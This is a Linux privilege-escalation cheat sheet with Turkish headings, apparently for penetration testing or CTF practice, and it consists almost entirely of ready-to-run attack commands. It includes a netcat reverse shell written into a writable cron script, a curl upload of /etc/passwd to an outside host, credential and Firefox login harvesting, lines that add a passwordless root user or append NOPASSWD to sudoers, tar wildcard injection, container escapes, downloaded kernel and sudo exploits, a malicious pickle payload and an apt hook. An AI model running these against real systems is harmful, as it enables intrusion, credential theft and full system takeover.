# Linux Privilege Escalation

### Shell Upgrade

```bash
# if python is available: spawn a proper pty
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

# if python is not available
script /dev/null -qc /bin/bash

# afterwards: background the remote shell from the local terminal
CTRL + Z

stty size # prints "rows columns" of the local terminal; those two values go into the stty line below
stty raw -echo; fg; ls;
export SHELL=/bin/bash; export TERM=xterm;
stty rows 181 columns 42; reset; # sample values — NOTE(review): 181 rows / 42 columns looks swapped, confirm against `stty size`
```

### Kullanıcı ve Gruplar

```bash
id # current user and group membership
env # environment variables
history # command history of this shell session (a freshly spawned shell may show little; the saved file is ~/.bash_history)
getent group sudo # members of the sudo group
lastlog # last login of each user
w # currently logged-in users

cat /etc/passwd # all users
cat /etc/group # groups

realm list # domain membership information
klist # Kerberos tickets
```

### Sistem Bilgileri

```bash
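hostname # hostname
uname -a # kernel version
cat /etc/os-release # operating system
cat /etc/issue # system banner shown at login
cat /etc/shells # all login shells
cat /etc/fstab # filesystems configured to be mounted at boot (what is mounted right now: `mount` below)

dpkg -l # installed packages (Debian-based systems)
echo "$PATH" # PATH variable
mount # currently mounted filesystems
lsblk # block devices
lsmod # loaded kernel modules
/sbin/modinfo libata # details of one module
ps aux # all processes
pspy64 # monitor process activity
timeout 20 ./pspy64 # run it for 20 seconds

# word search; pseudo-filesystems are skipped because reading entries under /proc, /sys and /dev can block forever
grep -Ril --exclude-dir={proc,sys,dev,run} "aranacak_kelime" / 2>/dev/null
find / -name flag.txt 2>/dev/null # file search
ls /tmp # temporary directory
ls /dev/shm # temporary directory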
```

### Ağ Bilgileri

```bash
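# network interfaces
ip a
ifconfig -a # -a lists all interfaces, including ones that are down
arp -a

# listening ports and owning processes
netstat -punta
ss -tulpn

# routing table
route
cat /etc/networks
ip route

# firewall rules (iptables-persistent); usually readable only by root
cat /etc/iptables/rules.v4

# credentials passing over the loopback interface in clear text
sudo tcpdump -i lo -A | grep "pass"

cat /etc/hosts # hosts file
cat /etc/resolv.conf # DNS resolver configuration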
```

### Dosya Transferi

```bash
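# HTTP download: serve on one side, fetch on the other
python3 -m http.server 80
wget 192.168.1.2/linpeas.sh -O /tmp/linpeas.sh
wget 192.168.1.2/linpeas.sh -O /dev/shm/linpeas.sh
curl -L 192.168.1.2/linpeas.sh -o /tmp/linpeas.sh
# executes whatever the server returns without keeping a copy; prefer the download-then-run form above
curl -L 192.168.1.2/linpeas.sh | bash

# base64 download/upload (-w 0 keeps the output on a single line for copy/paste)
base64 -w 0 id_rsa; echo
echo -n 'BASE64' | base64 -d > id_rsa

# netcat download/upload: the listener writes the file, the sender reads it
nc -lvnp 1234 > file.txt
nc -q 0 192.168.1.3 1234 < file.txt

# HTTPS upload: the certificate is self-signed, which is why the client needs --insecure
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
python3 -m uploadserver 443 --server-certificate ~/server.pem
curl -X POST https://192.168.1.2/upload -F 'files=@/etc/passwd' --insecure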
```

### Önemli Dizinler

```bash
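python2.7 laZagne.py all
python3 laZagne.py browsers
ls -l .mozilla/firefox/ | grep default
jq . .mozilla/firefox/1bplpd86.default-release/logins.json
python3.9 firefox_decrypt.py

# Configs: the pattern is quoted so that find, not the shell, expands the glob
for ext in .conf .config .cnf; do
  printf '\nFile extension: %s\n' "$ext"
  find / -name "*$ext" 2>/dev/null | grep -v "lib\|fonts\|share\|core"
done


# Config files: paths are read line by line (a for-loop over $(find) would split on spaces)
find / -name "*.cnf" 2>/dev/null | grep -v "doc\|lib" | while IFS= read -r cfg; do
  printf '\nFile: %s\n' "$cfg"
  grep "user\|password\|pass" "$cfg" 2>/dev/null | grep -v "#"
done

find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null


find / -type f -iname "*config*" 2>/dev/null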

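# Databases: patterns are quoted so the shell does not expand them against the current directory
for ext in .sql .db '.*db' '.db*'; do
  printf '\nDB File extension: %s\n' "$ext"
  find / -name "*$ext" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"
done

# Notes: regular files under /home ending in .txt or without an extension
# (parentheses are required; without them -type f only applies to the first branch and directories match the second)
find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \)

# Scripts
for ext in .py .pyc .pl .go .jar .c .sh; do
  printf '\nFile extension: %s\n' "$ext"
  find / -name "*$ext" 2>/dev/null | grep -v "doc\|lib\|headers\|share"
done

# Private keys (":1" is meant to keep hits on the first line, where a key file begins)
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

# Public keys
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

# Bash history
tail -n5 /home/*/.bash*

# Documents
for ext in .xls '.xls*' .xltx .csv '.od*' .doc '.doc*' .pdf .pot '.pot*' '.pp*'; do
  printf '\nFile extension: %s\n' "$ext"
  find / -name "*$ext" 2>/dev/null | grep -v "lib\|fonts\|share\|core"
done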

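# Log files (which ones exist depends on the distribution)
cat /var/log/messages
cat /var/log/syslog
cat /var/log/auth.log
cat /var/log/secure
cat /var/log/boot.log
cat /var/log/dmesg
cat /var/log/kern.log
cat /var/log/faillog
cat /var/log/cron
cat /var/log/mail.log
ls /var/log/httpd # a directory on RHEL-family systems, so it is listed rather than cat'ed
cat /var/log/mysqld.log
cd /var/spool/mail # mail spools

cat /proc/self/environ # environment variables (those inherited by the cat process)
cat /proc/PID/cmdline # command line of a process; PID is a placeholder (/proc/self would be cat itself)


# Log search: grep -q tests each file once instead of capturing all matches and grepping again
log_pattern="accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND=\|logs"
for log in /var/log/*; do
  [[ -f "$log" ]] || continue
  if grep -q "$log_pattern" "$log" 2>/dev/null; then
    printf '\n#### Log file: %s\n' "$log"
    grep "$log_pattern" "$log" 2>/dev/null
  fi
done

# Kerberos tickets (pattern quoted so the shell does not expand it first)
find / -name "*keytab*" -ls 2>/dev/null

# All domain credentials
./linikatz.sh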
```

### CronJobs

```bash
cat /etc/crontab
ls -lah /etc/cron* # list of cron jobs
cat /var/spool/cron/crontabs/root # root's crontab (typically readable only by root)
crontab -l # current user's cron jobs
sudo crontab -l # root's cron jobs (if sudo permits)
grep "CRON" /var/log/syslog # cron activity in the system log
./pspy64 -pf -i 1000 # monitors process activity

# all cron jobs
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

# reverse shell via a cron script that is writable by the current user (check its permissions first)
ls -la /home/john/backup.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f" > /home/john/backup.sh

# root shell via the same writable script
echo -e '#!/bin/bash\ncp /bin/bash /tmp/bash; chmod +s /tmp/bash' > backup.sh
/tmp/bash -ip

# sudo rights via the same writable script
# (defender note: file-integrity monitoring on cron targets and /etc/sudoers catches all three variants)
printf '#! /bin/bash\necho "john ALL=NOPASSWD:ALL" >> /etc/sudoers' > /home/john/backup.sh
```

### World Writable Dosyalar

```bash
find / -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "$HOME/*" -writable 2>/dev/null # world/user-writable files outside home

# if /etc/passwd is writable, a root-equivalent user can be added
openssl passwd password
echo "root2:xxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash" >> /etc/passwd # xxx… = the hash printed by the openssl line
su root2

# or without a password
echo "root2::0:0:root:/root:/bin/bash" >> /etc/passwd

# if /etc/shadow is writable
mkpasswd -m yescrypt password
nano /etc/shadow

# previous passwords are kept in this file
cat /etc/security/opasswd


unshadow passwd shadow > unshadowed.hashes
# -m 1800 is sha512crypt ($6$); NOTE(review): yescrypt ($y$) hashes, like the one mkpasswd produces above, need a different mode/tool — confirm
# wordlist path varies by distribution (Kali: /usr/share/wordlists/rockyou.txt)
hashcat -m 1800 -a 0 unshadowed.hashes /usr/share/rockyou.txt
```

### SUID Binary

```bash
find / -user root -perm -4000 2>/dev/null # root-owned SUID binaries
find / -user root -perm -6000 2>/dev/null # root-owned binaries with both SUID and SGID set

# the following are normally SUID on a stock system (noise)
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/bin/umount

# or: a SUID binary that uses a file we are allowed to modify
ls -la backup.sh # the SUID file
ls -la backup.config # the file the SUID binary calls

cp /bin/bash > backup.config
./backup.sh
```

### SUDO

Bu komutlar ile hangi dosyaları sudo komutu ile çalıştırabileceğimizi görebiliriz.

```bash
sudo -l # commands this user may run through sudo

# if a shell script is allowed as root with NOPASSWD:ALL, a shell can be obtained through it
sudo /usr/bin/backup.sh -c /bin/bash
```

### Binary Capabilities

GTFOBins: <https://gtfobins.github.io/>

```bash
/usr/sbin/getcap -r / 2>/dev/null # files with file capabilities set

# these are expected defaults (noise)
#/usr/bin/ping = cap_net_raw+ep
#/usr/bin/mtr-packet = cap_net_raw+ep
```

### Wildcard Abuse

Eğer bir cronjob'da \* karakteri varsa aşağıdaki exploit uygulanabilir.

```bash
# files whose names look like tar options; an unquoted glob in the cron job passes them to tar as arguments
echo > "--checkpoint=1"
echo > "--checkpoint-action=exec=sh shell.sh"
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
chmod 777 shell.sh
/tmp/bash -ip
# mitigation: jobs should put "--" before the glob or feed tar an explicit file list (find -print0 | tar --null -T -)
```

### Yetkili Gruplar

```bash
id # group membership decides which of the paths below apply

# lxd group: privileged container with the host root filesystem mounted inside
lxc image import alpine.tar.gz --alias alpine
lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/bash

# docker group: the host root filesystem is mounted into a container via the docker socket
docker image ls
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash

# disk group (no commands listed on this page)

# adm group: read access to logs
cd /var/log
```

### Screen Privilege Esc

```bash
# third-party exploit script, run exactly as downloaded; read it before executing it
wget https://raw.githubusercontent.com/YasserREED/screen-v4.5.0-priv-escalate/refs/heads/main/exploit.sh
bash exploit.sh
```

### Logrotten

```bash
# the exploit applies when logrotate.conf uses "create" or "compress"
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

wget https://raw.githubusercontent.com/whotwagner/logrotten/refs/heads/master/logrotten.c
gcc logrotten.c -o logrotten -static
./logrotten -p ./reverse /tmp/tmp.log # presumably -p = payload file, last argument = the log being rotated; verify with the tool's usage

```

### Shared Object Hijacking

```bash
ldd payroll # shared libraries the binary resolves at load time
readelf -d payroll  | grep PATH # RPATH/RUNPATH entries: extra library search directories baked into the binary
gcc rev.c -fPIC -shared -o /development/libshared.so # builds a replacement library into that search directory
```

### Python Module Permission

```
# python: the script that imports the module
import psutil
available_memory = psutil.virtual_memory()

# shell: locate the module source and check whether it is writable
grep -r "def virtual_memory" /usr/local/lib/python3.8/dist-packages/psutil/*
ls -la /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
vim /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
# python: line added inside the module (writable site-packages is the misconfiguration to fix)
os.system('id')
```

### Automated

```bash
# local (serving side)
cp /usr/bin/unix-privesc-check .
cp /usr/share/peass/linpeas . # NOTE(review): on Kali the package ships a linpeas/ directory rather than a file — confirm the path
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python -m http.server 80 # needs Python 3; "python" may still be 2.x on older hosts

# target
cd /tmp
wget http://192.168.1.3/LinEnum.sh
wget http://192.168.1.3/linpeas
wget http://192.168.1.3/unix-privesc-check

chmod +x LinEnum.sh
chmod +x linpeas
chmod +x unix-privesc-check

./LinEnum.sh
./linpeas
./unix-privesc-check standard > output.txt
```

### Firefox Creds

Decrypter: <https://github.com/unode/firefox_decrypt>

```bash
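# "x.default-esr" stands for the profile directory name; list /root/.mozilla/firefox/ to find the real one
cat /root/.mozilla/firefox/x.default-esr/logins.json
cat /root/.mozilla/firefox/x.default-esr/cookies.sqlite
cat /root/.mozilla/firefox/x.default-esr/formhistory.sqlite
cat /root/.mozilla/firefox/x.default-esr/key4.db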
```

### Kernel Exploit

```bash
cat /etc/issue
cat /etc/lsb-release
uname -r # kernel version, matched against the exploit's affected range

# the unescaped "." matches any character; grep -F "4." would match the literal string
searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"
python -m http.server 80

wget http://192.168.1.3/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995
```

### Sudo < 1.9.5p2

CVE-2021-3156: <https://github.com/worawit/CVE-2021-3156>

```bash
# if vulnerable, this prints "sudoedit: /: not a regular file" (the page describes it as a segfault); a patched sudo prints its usage instead
sudoedit -s /

sudo --version
sudo -V

python3 sudo_lpe.py
```

### Dirty Pipe

Checker: <https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker>

DirtyPipe: <https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits>

```bash
uname -r # on the target
dpipe.sh 5.10.0 # locally: checker script for the kernel version reported above

gcc exploit-1.c -o dpipe1 -static # -static so the binary does not depend on the target's libc
gcc exploit-2.c -o dpipe2 -static

./dpipe1
./dpipe2 /usr/bin/su
```

### Screen 4.5.0

Exploit: <https://github.com/YasserREED/screen-v4.5.0-priv-escalate>

### Pwnkit

```bash
# prebuilt binary from a third-party repository, run as downloaded; build from source when the code can be reviewed
wget https://github.com/ly4k/PwnKit/raw/refs/heads/main/PwnKit
./PwnKit
```

### Pickle Priv Esc

```python
import torch
import os

class Payload:
    # torch.save serialises with pickle; __reduce__ tells pickle how to rebuild the object,
    # so the callable it returns runs at load time, on whoever calls torch.load on the file.
    def __reduce__(self) -> tuple:
        return (os.system, ("whoami",))

evil = Payload()
torch.save(evil, 'evil.pth')
# mitigation on the loading side: torch.load(..., weights_only=True) refuses arbitrary callables like this one
```

### APT-GET CronJob Priv Esc (/etc/apt/apt.conf.d)

```bash
# apt reads every file in this directory; a Pre-Invoke hook runs as root whenever apt update runs
# ("revshell" is a placeholder for the command). Defender check: audit this directory for unexpected hook entries.
cd /etc/apt/apt.conf.d
echo 'apt::Update::Pre-Invoke {"revshell"};' > shell
```


